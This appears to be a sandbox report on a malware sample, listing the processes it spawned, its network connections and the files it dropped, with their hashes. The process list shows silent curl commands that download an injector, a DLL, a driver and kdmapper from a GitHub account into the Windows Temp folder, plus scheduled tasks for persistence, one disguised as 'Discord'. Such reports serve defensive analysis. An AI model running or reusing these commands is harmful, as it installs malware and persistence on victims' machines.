"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\mnftyjkrgjsae.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security" /tr "C:\Users\Admin\AppData\Roaming\$77Security.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareogfn.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent > nul 2>&1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\injectorOld.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injectorOld.exe --silent > nul 2>&1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\driver.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent > nul 2>&1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\mapper.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper_Release.exe --silent > nul 2>&1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareinj.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/pclient.exe --silent > nul 2>&1
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vcA5Tv90K4FS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\6zrByAls3DvP.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\sVmf8lqIKSUG.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\E1kCl8cXHof9.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\IQsQgJ63pmbf.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 123.ywxww.net | udp |
| CN | 60.191.208.187:820 | 123.ywxww.net | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| N/A | 127.0.0.1:49275 | tcp | |
| N/A | 127.0.0.1:49281 | tcp | |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | udp |
| CN | 47.93.243.161:39124 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| US | 8.8.8.8:53 | duck.com | udp |
| IE | 52.142.124.215:80 | duck.com | tcp |
| US | 8.8.8.8:53 | duck.com | udp |
| IE | 52.142.124.215:80 | duck.com | tcp |
| US | 8.8.8.8:53 | duck.com | udp |
| US | 8.8.8.8:53 | duck.com | udp |
| IE | 52.142.124.215:443 | duck.com | tcp |
| US | 8.8.8.8:53 | duck.com | udp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| US | 8.8.8.8:53 | improving.duckduckgo.com | udp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 34.54.88.138:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 34.54.88.138:443 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| FR | 142.250.179.67:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| FR | 142.250.179.67:443 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| FR | 172.217.18.195:443 | recaptcha.net | tcp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| FR | 172.217.18.195:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| FR | 172.217.20.164:443 | www.google.com | udp |
| RU | 188.119.66.185:443 | 188.119.66.185 | tcp |
| NL | 31.214.157.206:2024 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 104.99.233.208:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | ojang.pe.kr | udp |
| US | 8.8.8.8:53 | eveezueigohehla.co | udp |
| RU | 185.215.113.66:80 | eveezueigohehla.co | tcp |
| KR | 119.194.226.67:80 | ojang.pe.kr | tcp |
| US | 8.8.8.8:53 | jtpdev.co.uk | udp |
| GB | 91.238.160.241:443 | jtpdev.co.uk | tcp |
| US | 34.102.78.64:9002 | 34.102.78.64 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | www.ojang.pe.kr | udp |
| ID | 103.123.98.86:80 | 103.123.98.86 | tcp |
| KR | 119.194.226.67:80 | www.ojang.pe.kr | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | otyt.ru | udp |
| US | 8.8.8.8:53 | nudump.com | udp |
| US | 8.8.8.8:53 | selltix.org | udp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.66:80 | eveezueigohehla.co | tcp |
| US | 8.8.8.8:53 | otyt.ru | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | atten-supporse.biz | udp |
| RU | 185.215.113.66:80 | eveezueigohehla.co | tcp |
| US | 104.21.32.1:443 | atten-supporse.biz | tcp |
| US | 8.8.8.8:53 | nudump.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | selltix.org | udp |
| US | 8.8.8.8:53 | loeghaiofiehfihf.to | udp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | havocc.ddns.net | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| RU | 188.119.66.185:443 | 188.119.66.185 | tcp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| NL | 31.214.157.206:2024 | tcp | |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | selltix.org | udp |
| US | 8.8.8.8:53 | otyt.ru | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | nudump.com | udp |
| N/A | 127.0.0.1:6000 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| DE | 23.197.127.21:443 | steamcommunity.com | tcp |
| HK | 192.252.183.228:2087 | 192.252.183.228 | tcp |
| US | 8.8.8.8:53 | selltix.org | udp |
| VN | 103.211.201.109:6000 | tcp | |
| RU | 176.113.115.163:443 | 176.113.115.163 | tcp |
| RU | 185.215.113.67:15206 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | selltix.org | udp |
| N/A | 127.0.0.1:6000 | tcp | |
| KR | 119.194.226.67:80 | www.ojang.pe.kr | tcp |
| RU | 185.215.113.9:12617 | tcp | |
| CN | 61.154.0.139:9000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| KR | 119.194.226.67:80 | www.ojang.pe.kr | tcp |
| KR | 119.194.226.67:80 | www.ojang.pe.kr | tcp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | www.mva.by | udp |
| BY | 93.125.99.121:80 | www.mva.by | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| US | 8.8.8.8:53 | selltix.org | udp |
| US | 8.8.8.8:53 | c0al1t1onmatch.cyou | udp |
| US | 8.8.8.8:53 | thicktoys.sbs | udp |
| US | 8.8.8.8:53 | sgz-1302338321.cos.ap-guangzhou.myqcloud.com | udp |
| CN | 159.75.57.35:443 | sgz-1302338321.cos.ap-guangzhou.myqcloud.com | tcp |
| NL | 89.105.223.196:29862 | tcp | |
| CN | 117.146.200.209:40500 | tcp | |
| IR | 151.247.243.189:40500 | udp | |
| US | 8.8.8.8:53 | fleez-inc.sbs | udp |
| VN | 103.211.201.109:6000 | tcp | |
| US | 8.8.8.8:53 | pull-trucker.sbs | udp |
| N/A | 127.0.0.1:6000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| VN | 103.211.201.109:6000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| CN | 159.75.57.69:443 | sgz-1302338321.cos.ap-guangzhou.myqcloud.com | tcp |
| VN | 103.211.201.109:6000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| RU | 188.119.66.185:443 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| N/A | 127.0.0.1:6000 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| VN | 103.211.201.109:6000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| VN | 103.211.201.109:6000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| VN | 103.211.201.109:6000 | tcp |
Files
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders.zip
| MD5 | 94fe78dc42e3403d06477f995770733c |
| SHA1 | ea6ba4a14bab2a976d62ea7ddd4940ec90560586 |
| SHA256 | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267 |
| SHA512 | add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463.zip
| MD5 | 202786d1d9b71c375e6f940e6dd4828a |
| SHA1 | 7cad95faa33e92aceee3bcc809cd687bda650d74 |
| SHA256 | 45930e1ff487557dd242214c1e7d07294dbedfa7bc2cf712fae46d8d6b61de76 |
| SHA512 | de81012a38c1933a82cb39f1ac5261e7af8df80c8478ed540111fe84a6f150f0595889b0e087889894187559f61e1142d7e4971d05bceb737ed06f13726e7eae |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
| MD5 | 2a94f3960c58c6e70826495f76d00b85 |
| SHA1 | e2a1a5641295f5ebf01a37ac1c170ac0814bb71a |
| SHA256 | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce |
| SHA512 | fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f |
memory/2700-12-0x0000000001180000-0x0000000001188000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab168F.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar16B1.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db\data.safe.bin
| MD5 | a7c16e8e81bade7872d9d2925a0bef47 |
| SHA1 | 3a39d4faa91d8d83e86dd327032a59a86df7674c |
| SHA256 | f4ddf75381010676b6f11e73ee956ae37ac07e89f2e61057959469d1a003181a |
| SHA512 | 0ee60effb3a8b80c28b90bb7f9021762249bb259a1d00d357fabf2079dfb846755332cdd42aeb8188a508ec41b36822ae7f1013767cbaa39fea686172ae04606 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 86786ae2cc5a65ed1165cf8ed3f3fc2a |
| SHA1 | fd800caddffd66b43f4082159a936f34115e18d2 |
| SHA256 | 109ecea602641776ea908b5d4b4bb83dea467b6ff1652e21d840595ae6cf65bb |
| SHA512 | aca25a50f764c29ac6848b73356d6221cb40e4395309aaf92631fcd720cd67870197f0f9a1d5117ec9da3a9920e599f895dc68aa2e828b5cef16aa7c48f145c9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings\2e8f2d02-8e09-4e88-a597-a17833646b75
| MD5 | 228734b56b26f25e44aa008cfcff8d7e |
| SHA1 | 270a21274b8f503d597a65f67f7e7018cf4b94e7 |
| SHA256 | ecfb7ec6281faa52b17e073c761fb7d90fbaf4855df778c1a6a038e863bf92a9 |
| SHA512 | 79a78668e58c02a627474e92353a5152c03ce620167d297fdd902faec660895b9c81aaf6d43512b3587e5e3c1a4c9a1f228be54202c725c41135ae6321b9935e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings\2f519624-ac36-4dce-910b-0c169841ed15
| MD5 | 585d7a36c6d89ee5ff1c87c317953ba8 |
| SHA1 | 0f9eedab9306a985804df9fedd1e90b89f6677fe |
| SHA256 | 81aa7c28f0e4286aa56950654bb0c7563ce887385e466c4f25ae15ccd08fa29d |
| SHA512 | 2b8bb0082cd534fdc2686077101bb7c5c281f649027fe1c3d70b3070684e55215a5cb034b1239c76717fa0349fba524d2867eb5f05ee93063fa77ae2087d7a70 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 24027edb6f2b4851b27b87be7b9ac684 |
| SHA1 | 36b37c9c78feb54873f0c1f48ddda9cb651a3506 |
| SHA256 | b0e253b125f8d463d6bac4ae3f90cde42b96d9308b3bb56cd268cbb1a0e2519d |
| SHA512 | cb6fe41e50be9fc23ae53d25898633bc246379c8eeae2799f96b9d79fdca9c68908af0f2daf4c0851087a7ed1f50a2e988838a28e162f2f72b57e55e21e76ed5 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | c77ef3ac5691937794a4b654438ae001 |
| SHA1 | bc4d88b6b41c465c66801b19a8ee908762d09135 |
| SHA256 | 868f3a4a2c8e846b8bfdd1bd3189b06f9a4eaa9cf3f9ddbe6dc5e10e90b46f63 |
| SHA512 | 91fc8d1451a059e1c8ef5a7a0481d3dc9db4339db04f91d15bdcc174806db6a72cc6a9d15c6e96f219e1555ccf9fd2d3b1aa5b94f5c2cac2a51942316b360bee |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs.js
| MD5 | ef93205dd26e7d8f6d09c94a485c0f16 |
| SHA1 | e679e7a9bf8883ca44e52204d97a3815f5bdd703 |
| SHA256 | a5c6f82d73126cd53d530eb6cbb738a3c475dbe57d59e6b533e7c70f3b19fbf4 |
| SHA512 | aaee0f773f6e83b87fe86ce9bc877c3e0dbe34d718db0c31a7ad5bef0779ca732c2624b3225ab4df6a4033fc90f9ff83d821092a4a04dab2ef99532a9ccf3561 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 956381e891de665f7457eda961e71331 |
| SHA1 | 29d0519ad97a52bf0f43991355583e153de0e018 |
| SHA256 | dfd32270fc04f2b89a170fdc2b305ccff9e7563409c5a585b808390871c01785 |
| SHA512 | 18c0d38f855fdd81c34a55f3e86f2ba7a77a68ff16773ac823095940cc0aff5cf307bb2beedb2e961b2d7a3cb4a8287d1a9fbc8ac8598b73bf94f8de4031b85a |
\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pered.exe
| MD5 | faf1270013c6935ae2edaf8e2c2b2c08 |
| SHA1 | d9a44759cd449608589b8f127619d422ccb40afa |
| SHA256 | 1011889e66c56fd137bf85b832c4afc1fd054222b2fcbaae6608836d27e8f840 |
| SHA512 | 4a9ca18f796d4876effc5692cfeb7ce6d1cffdd2541b68753f416d2b0a7eff87588bc05793145a2882fc62a48512a862fa42826761022fed1696c20864c89098 |
\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | 683d6579333e3973206b54af6be2c5ea |
| SHA1 | e9aebf6246633ead1750acbfaae4fdd6f767bec9 |
| SHA256 | c446925083f68506717f84e9303d1ac9394bd32c1d98087784499f103617f1d2 |
| SHA512 | 858f87f00a28cf66215298673bbb8b4ef24ef7a160b932dfed421d4c5d78f469aea0c712d97cf154a264425137a25651d230a4137e1c6bdd4992096acf8370c7 |
C:\Users\Admin\AppData\Local\Temp\_MEI11362\python310.dll
| MD5 | c80b5cb43e5fe7948c3562c1fff1254e |
| SHA1 | f73cb1fb9445c96ecd56b984a1822e502e71ab9d |
| SHA256 | 058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20 |
| SHA512 | faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81 |
\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-file-l1-2-0.dll
| MD5 | fb8b3af45dca952911937032195294b8 |
| SHA1 | d4acbd029249c205a3c241731738a7b6ea07e685 |
| SHA256 | 4b0f7c14614724b0a54d236efa2f346dcc0bc37d995503c54ff630a7d20c7883 |
| SHA512 | e53486631886a4b9e2470b7409bad5c160946912c999df2180c313f052877c58b7574d73ec901db8a53c3663fd59cb36010842fd9ed7fafb64ab786ab4058a7f |
\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 5fbb3fc0ca37ed94744d6af8638b7c9a |
| SHA1 | 09415405267ee64c92e0fd43ead7dbfe2f028647 |
| SHA256 | 4c0ba89e487ec98966cc0b68bdeb07bbeb958f3a4ad866382a4185baf31f9041 |
| SHA512 | 150d318ef5480d9f0e23ee23ae5ba7eb070996e4cae0746d6a5ba53b716ecfbc694ad8044e4aa7d7dc16984b2af26f01e5ca6f665ac73c878f6a18fc60364453 |
\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 0f38dd38b314e7e7ada9f09506d9df32 |
| SHA1 | 5c83750cf4aea5293d704df043f505ea4d05e239 |
| SHA256 | 5f3dc66fb6ed58b324512c57ef781d1092c1c2ae7e0cb5d287907f9b4bb77248 |
| SHA512 | c80dfdf3a3eeefacf631f31691aec278d01b08b4c2ec151d3eeef2256c37202ff6aad363f872e7f9d8b969663db72f213f68e3d4e709a2df39fce643689d1604 |
\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-file-l2-1-0.dll
| MD5 | afb7cd2310f1c2a3a5a1cc7736697487 |
| SHA1 | d435168703dba9a2b6e955a1332111687a4d09d7 |
| SHA256 | 2e75641d7330b804c3cc6ef682306d2b0f89c4358dac3e1376b5fb2ebd6e2838 |
| SHA512 | 3a05ff62f4c2cd71d5ecd5732c9d3f8ef91077a056e4082530fed64409b26cab7f4617e03ca65faf1738faffec49f2de65f0f082cbbda1b12bdd07b85b985c26 |
\Users\Admin\AppData\Local\Temp\_MEI11362\ucrtbase.dll
| MD5 | cd7a487bb5ca20005a81402eee883569 |
| SHA1 | f427aaf18b53311a671e60b94bd897a904699d19 |
| SHA256 | f4723261c04974542a2c618fe58f4995f2dcaf6996656bb027d65adeeca6caf7 |
